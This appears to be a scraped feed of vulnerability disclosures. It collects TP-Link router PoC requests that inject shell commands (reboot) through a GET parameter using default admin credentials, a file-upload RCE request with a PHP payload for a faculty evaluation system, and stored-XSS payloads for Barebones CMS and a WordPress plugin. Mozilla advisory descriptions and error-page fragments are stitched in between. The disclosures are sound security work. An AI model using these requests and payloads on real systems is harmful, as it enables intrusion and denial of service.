TP-Link TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2 was discovered to contain a buffer overflow via the component /userRpm/FixMapCfgRpm.

**TP-Link TL-WR940N/TL-WR841N/TL-WR740N wireless router /userRpm/FixMapCfgRpm buffer read out-of-bounds vulnerability****1 Basic Information**

*   Vulnerability Type: Buffer read out-of-bounds
*   Vulnerability Description: A buffer read out-of-bounds vulnerability exists in TP-Link TL-WR940N V2/V4、TL-WR841N V8/V10 and TL-WR740N V1/V2 wireless router. Its /userRpm/FixMapCfgRpm component has a security vulnerability in processing Changed GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing buffer out-of-bounds read errors, which may lead to memory-sensitive information leakage and denial of service.
*   Device model:
    *   TP-Link TL-WR940N V2/V4、TP-Link TL-WR841N V8/V10、TP-Link TL-WR740N V1/V2

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：7.1 High AV:N/AC:H/Au:S/C:C/I:C/A:C
    *   V3.1：8.6 High AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service

**3 PoC**

The PoC of TP-Link WR940N V4 is as follows:

GET /IFQHAXBBGJZJOIIA/userRpm/FixMapCfgRpm.htm?Mac=1C-BF-C0-7A-E0-03&Ip=192.168.2.139&State=1&Changed||CMD=$"reboot";$CMD=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/IFQHAXBBGJZJOIIA/userRpm/FixMapCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR940N V2 is as follows:

GET /DTLZRKGAQEMSCUNA/userRpm/FixMapCfgRpm.htm?Mac=00-1D-0F-11-22-33&Ip=192.168.0.2&State=1&;=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/KMODQNKANSQJBYFA/userRpm/FixMapCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR841N V8 is as follows:

GET /userRpm/FixMapCfgRpm.htm?Mac=78-2B-46-90-5c-67&Ip=192.168.0.3&State=1&Changed|reboot=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 0.0.0.0:49168
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://0.0.0.0:49168/userRpm/FixMapCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR841N V10 is as follows:

GET /PTSGMLKAISLZRVGB/userRpm/FixMapCfgRpm.htm?Mac=1C-BF-C0-7A-E0-04&Ip=192.168.3.1&State=1&;CMD=$'reboot';$CMD=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/BMKHACLAYMEWMEQA/userRpm/FixMapCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR740N is as follows:

GET /userRpm/FixMapCfgRpm.htm?Mac=00-16-EA-AE-3C-40&Ip=192.168.0.3&State=1&Changed;reboot=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://192.168.1.1/userRpm/FixMapCfgRpm.htm?Add=Add&Page=1
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/FixMapCfgRpm component has a security vulnerability in processing the Changed GET key parameter. The Changed parameter itself is put into the stack without being checked, resulting in a denial of service. An attacker exploits this vulnerability to construct a payload of the Changed parameter, so that the carefully constructed parameter causes a buffer out-of-bounds read error, which may lead to the disclosure of memory-sensitive information and denial of service. Attackers can directly achieve the effect of denial of service by exploiting this vulnerability.

The firmware simulation process and interface are as follows:

After sending the constructed PoC, the cache area read out of bounds and a BadVA error occurred, resulting in denial of service.

**5\. The basis for judging as a 0-day vulnerability**

Searching the FixMapCfgRpm keyword in the NVD database did not find any vulnerabilities; searching the firmware model + parameter Changed keyword in the NVD database did not find any vulnerabilities, so it is considered a 0-day vulnerability.

CVE-2023-33537: iotvul/TL-WR940N_TL-WR841N_TL-WR740N_userRpm_FixMapCfgRpm.md at main · a101e-IoTvul/iotvul

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via ip/eval/ajax.php?action=update_user.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: Cr4at0r

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin@admin.com/admin123 (Super Admin account)

Vulnerability url: ip/eval/ajax.php?action=update\_user

Loophole location: Faculty Evaluation System's "/eval/ajax.php?action=update\_user" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /eval/ajax.php?action\=update\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/eval/index.php?page=report
Content-Length: 737
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Cookie: PHPSESSID=qm3tmf7esa9t4jsgeln6vna57r
Connection: close
\-----------------------------166782539326470
Content-Disposition: form-data; name="id"
1
\-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"
Administrator
\-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"
a
\-----------------------------166782539326470
Content-Disposition: form-data; name="email"
admin@admin.com
\-----------------------------166782539326470
Content-Disposition: form-data; name="password"
\-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\-----------------------------166782539326470--

The files will be uploaded to this directory \\eval\\assets\\uploads\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-33569: bug_report/RCE-1.md at main · Cr4at0r/bug_report

Barebones CMS version 2.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)# Date: 2023-06-03# Exploit Author: tmrswrr# Vendor Homepage: https://barebonescms.com/# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip# Version: v2.0.2# Tested : https://demo.barebonescms.com/--- Description ---1) Login admin panel and go to new story : https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c011843235402) Click edit button and  write your payload in the title field:Payload: "><script>alert(1)</script>3) After save change and will you see alert buttonPOST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1Host: demo.barebonescms.comCookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 237Origin: https://demo.barebonescms.comDnt: 1Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeaction=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=

Barebones CMS 2.0.2 Cross Site Scripting

WordPress Circle Progress plugin version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Circle progress bar – Cross sitescripting-Stored# Date: 2-06-2023# Exploit Author: Taliya Bilal- NightHawk# Vendor Homepage: https://wordpress.org/plugins/circle-progress-bar/# Version: 1.0# Tested on: Firefox# Contact me: taliyabilal765@gmail.com# Steps to reproduce:1.  Install Circle progress bar and activate plugin.2.  Navigate to Circle progress bar plugin.3.  Fill the title field with xss payload <img src=x onerror=alert(1)>4.  Click the option preview post. Here the popup will appear.#Screenshot:https://freeimage.host/i/Hrbmskvhttps://freeimage.host/i/Hrbmy4n

WordPress Circle Progress 1.0 Cross Site Scripting

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 26 and June 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for May 26 to June 2

Mozilla developers and community members Gabriele Svelto, Andrew Osmond, Emily McDonough, Sebastian Hengst, Andrew McCreight and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 112 and Firefox ESR 102.10. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 113, Firefox ESR < 102.11, and Thunderbird < 102.11.

**Mozilla Foundation Security Advisory 2023-16**

Announced

May 9, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 113

**#CVE-2023-32205: Browser prompts could have been obscured by popups**

Reporter

Alesandro Ortiz

Impact

high

**Description**

In multiple cases browser prompts could have been obscured by popups controlled by content. These could have led to potential user confusion and spoofing attacks.

**References**

*   Bug 1753339
*   Bug 1753341

**#CVE-2023-32206: Crash in RLBox Expat driver**

Reporter

Irvan Kurniawan

Impact

high

**Description**

An out-of-bound read could have led to a crash in the RLBox Expat driver.

**References**

*   Bug 1824892

**#CVE-2023-32207: Potential permissions request bypass via clickjacking**

Reporter

Hafiizh

Impact

high

**Description**

A missing delay in popup notifications could have made it possible for an attacker to trick a user into granting permissions.

**References**

*   Bug 1826116

**#CVE-2023-32208: Leak of script base URL in service workers via import()**

Reporter

Anne van Kesteren

Impact

moderate

**Description**

Service workers could reveal script base URL due to dynamic import().

**References**

*   Bug 1646034

**#CVE-2023-32209: Persistent DoS via favicon image**

Reporter

Sam Ezeh

Impact

moderate

**Description**

A maliciously crafted favicon could have led to an out of memory crash.

**References**

*   Bug 1767194

**#CVE-2023-32210: Incorrect principal object ordering**

Reporter

Nika Layzell

Impact

moderate

**Description**

Documents were incorrectly assuming an ordering of principal objects when ensuring we were loading an appropriately privileged principal. In certain circumstances it might have been possible to cause a document to be loaded with a higher privileged principal than intended.

**References**

*   Bug 1776755

**#CVE-2023-32211: Content process crash due to invalid wasm code**

Reporter

P1umer and xmzyshypnc

Impact

moderate

**Description**

A type checking bug would have led to invalid code being compiled.

**References**

*   Bug 1823379

**#CVE-2023-32212: Potential spoof due to obscured address bar**

Reporter

Hafiizh

Impact

moderate

**Description**

An attacker could have positioned a datalist element to obscure the address bar.

**References**

*   Bug 1826622

**#CVE-2023-32213: Potential memory corruption in FileReader::DoReadData()**

Reporter

Ronald Crane

Impact

moderate

**Description**

When reading a file, an uninitialized value could have been used as read limit.

**References**

*   Bug 1826666

**#MFSA-TMP-2023-0002: Race condition in dav1d decoding**

Reporter

Tyson Smith

Impact

moderate

**Description**

A race condition during dav1d decoding could have led to an out-of-bounds memory access, potentially leading to memory corruption and execution of malicious code.

**References**

*   Bug 1814790
*   Bug 1819796
*   Bug 1814560

**#CVE-2023-32214: Potential DoS via exposed protocol handlers**

Reporter

Edward Prior

Impact

low

**Description**

Protocol handlers ms-cxh and ms-cxh-full could have been leveraged to trigger a denial of service.  
_Note: This attack only affects Windows. Other operating systems are not affected._

**References**

*   Bug 1828716

**#CVE-2023-32215: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Gabriele Svelto, Andrew Osmond, Emily McDonough, Sebastian Hengst, Andrew McCreight and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 112 and Firefox ESR 102.10. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

**#CVE-2023-32216: Memory safety bugs fixed in Firefox 113**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Ronald Crane, Andrew McCreight, Randell Jesup and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 112. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 113

CVE-2023-32215: Security Vulnerabilities fixed in Firefox 113

An out-of-bound read could have led to a crash in the RLBox Expat driver. This vulnerability affects Firefox < 113, Firefox ESR < 102.11, and Thunderbird < 102.11.

Sorry, I can't find "_1824892?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-32206: Invalid Bug ID

In multiple cases browser prompts could have been obscured by popups controlled by content. These could have led to potential user confusion and spoofing attacks. This vulnerability affects Firefox < 113, Firefox ESR < 102.11, and Thunderbird < 102.11.

Sorry, I can't find "_1753341?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-32205: Invalid Bug ID

When encoding data from an <code>inputStream</code> in <code>xpcom</code> the size of the input being encoded was not correctly calculated potentially leading to an out of bounds memory write. This vulnerability affects Firefox < 110, Thunderbird < 102.8, and Firefox ESR < 102.8.

**Mozilla Foundation Security Advisory 2023-05**

Announced

February 14, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 110

**#CVE-2023-25728: Content security policy leak in violation reports using iframes**

Reporter

Johan Carlsson

Impact

high

**Description**

The Content-Security-Policy-Report-Only header could allow an attacker to leak a child iframe's unredacted URI when interaction with that iframe triggers a redirect.

**References**

*   Bug 1790345

**#CVE-2023-25730: Screen hijack via browser fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A background script invoking requestFullscreen and then blocking the main thread could force the browser into fullscreen mode indefinitely, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1794622

**#CVE-2023-25743: Fullscreen notification not shown in Firefox Focus**

Reporter

Hafiizh

Impact

high

**Description**

A lack of in app notification for entering fullscreen mode could have lead to a malicious website spoofing browser chrome.  
_This bug only affects Firefox Focus. Other versions of Firefox are unaffected._

**References**

*   Bug 1800203

**#CVE-2023-0767: Arbitrary memory write via PKCS 12 in NSS**

Reporter

Christian Holler

Impact

high

**Description**

An attacker could construct a PKCS 12 cert bundle in such a way that could allow for arbitrary memory writes via PKCS 12 Safe Bag attributes being mishandled.

**References**

*   Bug 1804640

**#CVE-2023-25735: Potential use-after-free from compartment mismatch in SpiderMonkey**

Reporter

Samuel Groß

Impact

high

**Description**

Cross-compartment wrappers wrapping a scripted proxy could have caused objects from other compartments to be stored in the main compartment resulting in a use-after-free after unwrapping the proxy.

**References**

*   Bug 1810711

**#CVE-2023-25737: Invalid downcast in SVGUtils::SetupStrokeGeometry**

Reporter

Lukas Bernhard

Impact

high

**Description**

An invalid downcast from nsTextNode to SVGElement could have lead to undefined behavior.

**References**

*   Bug 1811464

**#CVE-2023-25738: Printing on Windows could potentially crash Firefox with some device drivers**

Reporter

Mark

Impact

high

**Description**

Members of the DEVMODEW struct set by the printer device driver weren't being validated and could have resulted in invalid values which in turn would cause the browser to attempt out of bounds access to related variables.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1811852

**#CVE-2023-25739: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext**

Reporter

Holger Fuhrmannek

Impact

high

**Description**

Module load requests that failed were not being checked as to whether or not they were cancelled causing a use-after-free in ScriptLoadContext.

**References**

*   Bug 1811939

**#CVE-2023-25729: Extensions could have opened external schemes without user knowledge**

Reporter

Vitor Torres

Impact

moderate

**Description**

Permission prompts for opening external schemes were only shown for ContentPrincipals resulting in extensions being able to open them without user interaction via ExpandedPrincipals. This could lead to further malicious actions such as downloading files or interacting with software already installed on the system.

**References**

*   Bug 1792138

**#CVE-2023-25732: Out of bounds memory write from EncodeInputStream**

Reporter

Ronald Crane

Impact

moderate

**Description**

When encoding data from an inputStream in xpcom the size of the input being encoded was not correctly calculated potentially leading to an out of bounds memory write.

**References**

*   Bug 1804564

**#CVE-2023-25734: Opening local .url files could cause unexpected network loads**

Reporter

Ameen Basha M K and Shaheen Fazim

Impact

moderate

**Description**

After downloading a Windows .url shortcut from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system. This also had the potential to leak NTLM credentials to the resource.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1809923
*   Bug 1784451
*   Bug 1810143
*   Bug 1812338

**#CVE-2023-25740: Opening local .scf files could cause unexpected network loads**

Reporter

Axel Chong (@Haxatron)

Impact

moderate

**Description**

After downloading a Windows .scf script from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system. This also had the potential to leak NTLM credentials to the resource.  
_This bug only affects Firefox for Windows. Other operating systems are unaffected._

**References**

*   Bug 1812354

**#CVE-2023-25731: Prototype pollution when rendering URLPreview**

Reporter

pyakovlev & Alexander Volkov

Impact

low

**Description**

Due to URL previews in the network panel of developer tools improperly storing URLs, query parameters could potentially be used to overwrite global objects in privileged code.

**References**

*   Bug 1801542

**#CVE-2023-25733: Possible null pointer dereference in TaskbarPreviewCallback**

Reporter

Ronald Crane

Impact

low

**Description**

The return value from gfx::SourceSurfaceSkia::Map() wasn't being verified which could have potentially lead to a null pointer dereference.

**References**

*   Bug 1808632

**#CVE-2023-25736: Invalid downcast in GetTableSelectionMode**

Reporter

Lukas Bernhard

Impact

low

**Description**

An invalid downcast from nsHTMLDocument to nsIContent could have lead to undefined behavior.

**References**

*   Bug 1811331

**#CVE-2023-25741: Same-origin policy leak via image drag and drop**

Reporter

Dohyun Lee (@l33d0hyun) of SSD Labs

Impact

low

**Description**

When dragging and dropping an image cross-origin, the image's size could potentially be leaked. This behavior was shipped in 109 and caused web compatibility problems as well as this security concern, so the behavior was disabled until further review.

**References**

*   Bug 1813376
*   Bug 1437126
*   Bug 1812611

**#CVE-2023-25742: Web Crypto ImportKey crashes tab**

Reporter

Goras Francesco

Impact

low

**Description**

When importing a SPKI RSA public key as ECDSA P-256, the key would be handled incorrectly causing the tab to crash.

**References**

*   Bug 1813424

**#CVE-2023-25744: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Kershaw Chang and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 109 and Firefox ESR 102.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8

**#CVE-2023-25745: Memory safety bugs fixed in Firefox 110**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Timothy Nikkel, Gabriele Svelto, Jeff Muizelaar and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 109. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 110

CVE-2023-25732: Security Vulnerabilities fixed in Firefox 110

Mozilla developers Randell Jesup, Andrew McCreight, Gabriele Svelto, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 111. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox for Android < 112, Firefox < 112, and Focus for Android < 112.

**Mozilla Foundation Security Advisory 2023-13**

Announced

April 11, 2023

Impact

high

Products

Firefox, Firefox for Android, Focus for Android

Fixed in

*   Firefox 112
*   Firefox for Android 112
*   Focus for Android 112

**#CVE-2023-29531: Out-of-bound memory access in WebGL on macOS**

Reporter

DoHyun Lee

Impact

high

**Description**

An attacker could have caused an out of bounds memory access using WebGL APIs, leading to memory corruption and a potentially exploitable crash.  
_This bug only affects Firefox for macOS. Other operating systems are unaffected._

**References**

*   Bug 1794292

**#CVE-2023-29532: Mozilla Maintenance Service Write-lock bypass**

Reporter

Holger Fuhrmannek

Impact

high

**Description**

A local attacker can trick the Mozilla Maintenance Service into applying an unsigned update file by pointing the service at an update file on a malicious SMB server. The update file can be replaced after the signature check, before the use, because the write-lock requested by the service does not work on a SMB server.  
_Note: This attack requires local system access and only affects Windows. Other operating systems are not affected._

**References**

*   Bug 1806394

**#CVE-2023-29533: Fullscreen notification obscured**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A website could have obscured the fullscreen notification by using a combination of window.open, fullscreen requests, window.name assignments, and setInterval calls. This could have led to user confusion and possible spoofing attacks.

**References**

*   Bug 1814597
*   Bug 1798219

**#CVE-2023-29534: Fullscreen notification could have been obscured on Firefox for Android**

Reporter

Shaheen Fazim and Hafiizh

Impact

high

**Description**

Different techniques existed to obscure the fullscreen notification in Firefox and Focus for Android. These could have led to potential user confusion and spoofing attacks.  
_This bug only affects Firefox and Focus for Android. Other versions of Firefox are unaffected._

**References**

*   Bug 1816059
*   Bug 1816007
*   Bug 1821155
*   Bug 1821576
*   Bug 1821906
*   Bug 1822298
*   Bug 1822305

**#CVE-2023-1999: Double-free in libwebp**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A double-free in libwebp could have led to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1819244

**#CVE-2023-29535: Potential Memory Corruption following Garbage Collector compaction**

Reporter

Lukas Bernhard

Impact

high

**Description**

Following a Garbage Collector compaction, weak maps may have been accessed before they were correctly traced. This resulted in memory corruption and a potentially exploitable crash.

**References**

*   Bug 1820543

**#CVE-2023-29536: Invalid free from JavaScript code**

Reporter

zx from qriousec

Impact

high

**Description**

An attacker could cause the memory manager to incorrectly free a pointer that addresses attacker-controlled memory, resulting in an assertion, memory corruption, or a potentially exploitable crash.

**References**

*   Bug 1821959

**#CVE-2023-29537: Data Races in font initialization code**

Reporter

Looben Yang

Impact

high

**Description**

Multiple race conditions in the font initialization could have led to memory corruption and execution of attacker-controlled code.

**References**

*   Bug 1823365
*   Bug 1824200
*   Bug 1825569

**#CVE-2023-29538: Directory information could have been leaked to WebExtensions**

Reporter

Alexis aka zoracon

Impact

moderate

**Description**

Under specific circumstances a WebExtension may have received a jar:file:/// URI instead of a moz-extension:/// URI during a load request. This leaked directory paths on the user's machine.

**References**

*   Bug 1685403

**#CVE-2023-29539: Content-Disposition filename truncation leads to Reflected File Download**

Reporter

Trung Pham

Impact

moderate

**Description**

When handling the filename directive in the Content-Disposition header, the filename would be truncated if the filename contained a NULL character. This could have led to reflected file download attacks potentially tricking users to install malware.

**References**

*   Bug 1784348

**#CVE-2023-29540: Iframe sandbox bypass using redirects and sourceMappingUrls**

Reporter

Axel Chong (@Haxatron)

Impact

moderate

**Description**

Using a redirect embedded into sourceMappingUrls could allow for navigation to external protocol links in sandboxed iframes without allow-top-navigation-to-custom-protocols.

**References**

*   Bug 1790542

**#CVE-2023-29541: Files with malicious extensions could have been downloaded unsafely on Linux**

Reporter

Ameen Basha M K

Impact

moderate

**Description**

Firefox did not properly handle downloads of files ending in .desktop, which can be interpreted to run attacker-controlled commands.  
_This bug only affects Firefox for Linux on certain Distributions. Other operating systems are unaffected, and Mozilla is unable to enumerate all affected Linux Distributions._

**References**

*   Bug 1810191

**#CVE-2023-29542: Bypass of file download extension restrictions**

Reporter

Shaheen Fazim and Ameen Basha M K

Impact

moderate

**Description**

A newline in a filename could have been used to bypass the file extension security mechanisms that replace malicious file extensions such as .lnk with .download. This could have led to accidental execution of malicious code.  
_This bug only affects Firefox on Windows. Other versions of Firefox are unaffected._

**References**

*   Bug 1815062
*   Bug 1810793

**#CVE-2023-29543: Use-after-free in debugging APIs**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

An attacker could have caused memory corruption and a potentially exploitable use-after-free of a pointer in a global object's debugger vector.

**References**

*   Bug 1816158

**#CVE-2023-29544: Memory Corruption in garbage collector**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

If multiple instances of resource exhaustion occurred at the incorrect time, the garbage collector could have caused memory corruption and a potentially exploitable crash.

**References**

*   Bug 1818781

**#CVE-2023-29545: Windows Save As dialog resolved environment variables**

Reporter

Axel Chong (@Haxatron)

Impact

moderate

**Description**

Similar to CVE-2023-28163, this time when choosing 'Save Link As', suggested filenames containing environment variable names would have resolved those in the context of the current user.  
_This bug only affects Firefox on Windows. Other versions of Firefox are unaffected._

**References**

*   Bug 1823077

**#CVE-2023-29546: Screen recording in Private Browsing included address bar on Android**

Reporter

Irwan

Impact

low

**Description**

When recording the screen while in Private Browsing on Firefox for Android the address bar and keyboard were not hidden, potentially leaking sensitive information.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1780842

**#CVE-2023-29547: Secure document cookie could be spoofed with insecure cookie**

Reporter

Marco Squarcina

Impact

low

**Description**

When a secure cookie existed in the Firefox cookie jar an insecure cookie for the same domain could have been created, when it should have silently failed. This could have led to a desynchronization in expected results when reading from the secure cookie.

**References**

*   Bug 1783536

**#CVE-2023-29548: Incorrect optimization result on ARM64**

Reporter

JunYoung Park

Impact

low

**Description**

A wrong lowering instruction in the ARM64 Ion compiler resulted in a wrong optimization result.

**References**

*   Bug 1822754

**#CVE-2023-29549: Javascript's bind function may have failed**

Reporter

Lukas Bernhard

Impact

low

**Description**

Under certain circumstances, a call to the bind function may have resulted in the incorrect realm. This may have created a vulnerability relating to JavaScript-implemented sandboxes such as SES.

**References**

*   Bug 1823042

**#CVE-2023-29550: Memory safety bugs fixed in Firefox 112 and Firefox ESR 102.10**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Randell Jesup, Andrew Osmond, Sebastian Hengst, Andrew McCreight, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 111 and Firefox ESR 102.9. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 112 and Firefox ESR 102.10

**#CVE-2023-29551: Memory safety bugs fixed in Firefox 112**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Randell Jesup, Andrew McCreight, Gabriele Svelto, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 111. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 112

Tag

#firefox